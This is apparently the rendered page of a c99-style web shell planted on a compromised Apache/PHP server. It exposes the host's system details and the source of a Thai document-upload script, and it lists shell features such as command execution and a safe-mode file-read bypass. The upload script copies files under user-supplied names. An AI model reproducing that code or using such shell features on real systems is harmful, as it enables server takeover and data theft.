Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/manage_depart/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php include("../include/FunctionDB.php"); ConnectDB(); $Flag = true; $Docom_name = htmlspecialchars(trim($Docom_name)); $conditionId = htmlspecialchars(trim($conditionId)); ///////////////////// check name if ($Docom_name =="") { $msg .="<li>กรุณากรอก รายการเอกสาร"; $button ="<input type=\"button\" value=\"Back to Edit\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">"; $Flag = false; } ///////////////////// check name if ($conditionId =="") { $msg .="<li>กรุณาเลือกหมวดเอกสาร"; $button ="<input type=\"button\" value=\"Back to Edit\" onclick=\"history.back();\" style=\"font-weight:bold;color:#FFF;background-color:#036;border-style:outset;border-color:#69F;font-family:Tohoma;\">"; $Flag = false; } /////////////////////// Check if( $Flag) { $Path = "../Doc_pic"; if ( isset($Img1)) if (copy($Img1,"$Path/$Img1_name")) { unlink ($Img1); $Img1 = "$Path/$Img1_name"; } else echo"Can't Copy"; // InsertDocument($Docom_name,$conditionId,"Doc_pic/".$_FILES['Img1']['name']); InsertDocument($Docom_name,$conditionId,$Img1); $msg.="<li>ระบบจัดเก็บข้อมูลเรียบร้อยแล้ว"; echo"<meta http-equiv=\"refresh\" content=\"2;URL=DocumentList.php\">\n"; } CloseDB(); ?> <html> <head> <title></title> <link rel="stylesheet" href="../css/style1.css" type="text/css"> <meta http-equiv="Content-Type" content="text/html; charset=windows-874"></head> <body bgcolor="#FFFFFF"> <form> <br> <table width="68%" border="0" cellspacing="0"cellpadding="2"align="center"> <tr> <td><div align="center"><span><b><font color="#003366" size="4" face="Tahoma">::ฟอร์มการเพิ่มข้อมูล::</font></b></span></div></td> </tr> <tr> <td> <table width="74%" border="0" cellspacing="1"cellpadding="0"align="center" class="table"> <tr> <td bgcolor="#BFD0E6"> <div align="center"><b><font color="#003366" size="3" face="Tahoma">ระบบแจ้งการทำงาน</font></b></div></td> </tr> <tr> <td bgcolor="#000000"> <table width="90%" border="0" cellspacing="0"cellpadding="2"align="center"> <tr> <td><font color="#FFFFFF" size="4" face="Tahoma"><span><b><?php echo $msg;?></b></span></font></td> </tr> </table></td> </tr> <tr> <td bgcolor="#BFD0E6"> <div align="center"><b><font color="#CCFF00"><?php echo $button;?></font></b></div></td> </tr> </table> </td> </tr> </table> <br> <br> </form> </body> </html> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]-- |